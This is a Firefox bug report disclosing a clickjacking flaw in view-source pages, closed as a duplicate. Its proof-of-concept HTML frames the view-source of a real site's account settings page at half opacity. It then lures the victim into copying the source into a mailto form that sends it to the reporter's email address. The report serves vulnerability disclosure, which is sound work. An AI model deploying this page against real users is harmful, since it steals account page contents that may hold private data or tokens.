953333 - clickjacking source code

Status: RESOLVED DUPLICATE of bug 624883

(Firefox :: Untriaged, defect)

Description

[akhilreni]

User Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36

Steps to reproduce:



<html>
<body>



	<style>

 body {
	  font-family: Arial;
  }
  #container{
  	position: relative;
 
	}

 #container2{
  	position: relative;
	
}


		

#iframe2 { 
		width: 800px; 
		height: 500px; 
		position: relative; 
		top: 0; left: 0; 
                 		filter: alpha(opacity=50); 
		opacity: 0.5; 
		}  
	</style>
<div id="container"><form 
  action="mailto:evilhawk08@gmail.com"
  method="POST"
  enctype="multipart/form-data"
  name="EmailTestForm">

copy paste here<br>
<input type="text" name="VisitorName"><br><br>


<input type="submit" value="Email This Form">

</form>

</div>
<div="container2"><h1>click down press ctrl+A and then copy it in the mail form above to recieve your code</h1><iframe id="iframe2" src="view-source:https://sellfy.com/user/#/settings/account">
</div>
	



</body>
</html>


Actual results:

hey there,

the source code of xframe headers missing sites can be clickjacked.
for example if a site has xframe headers missings, then an attacker can send a link to
victim and can lure victim to copy the source code and send it to attacker.
With this important things can be indeed revealed.

<iframe id="iframe2" src="view-source:https://sellfy.com/user/#/settings/account">


Expected results:

while in a chrome even if a site is vul to clickjacking the source code cannot be clickjacked.

I think this is a browser and should be fixed .

Hope you fix it soon :)

happy christmas

Comment 1

[Matt Wobensmith [:mwobensmith][:matt:]]

The view-source problem is known and is being discussed. Marking as a duplicate of bug 624883.